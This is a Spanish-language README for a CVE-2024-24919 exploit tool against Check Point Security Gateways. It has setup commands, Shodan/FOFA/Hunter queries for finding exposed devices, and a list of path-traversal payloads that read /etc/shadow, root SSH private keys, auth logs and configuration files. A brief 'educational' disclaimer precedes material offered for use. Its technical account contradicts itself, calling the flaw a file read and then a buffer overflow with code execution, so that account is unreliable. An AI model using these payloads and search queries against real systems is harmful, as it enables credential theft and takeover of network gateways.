
CVE-2024-24919 exploit
Este repositorio contiene una herramienta para explotar la vulnerabilidad CVE-2024-24919 en Check Point Security Gateways. La herramienta es un multi-escáner que puede identificar dispositivos vulnerables y un exploit de un solo objetivo que puede tomar el control total del dispositivo afectado.
CVE-2024-24919 es una vulnerabilidad de divulgación de información de alta gravedad que permite a un atacante leer archivos arbitrarios de forma remota en un Check Point Security Gateway. Esta vulnerabilidad puede ser explotada para robar información sensible, como contraseñas y archivos de configuración.
Descargo de responsabilidad:
Esta herramienta se proporciona únicamente con fines educativos. No debe utilizarse para atacar sistemas vulnerables sin el consentimiento explícito del propietario. Los autores de esta herramienta no son responsables de los daños que puedan derivarse de su uso.
El exploit funciona enviando una solicitud HTTP especialmente diseñada al dispositivo vulnerable. La solicitud desencadena un desbordamiento de búfer en el firmware del dispositivo, lo que permite al atacante ejecutar código arbitrario. El exploit puede usarse luego para tomar el control total del dispositivo.
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
¡Puedes escanear un solo objetivo o varios!
python cve-2024-24919.py
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"

$ Rutas de la herramienta : ```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```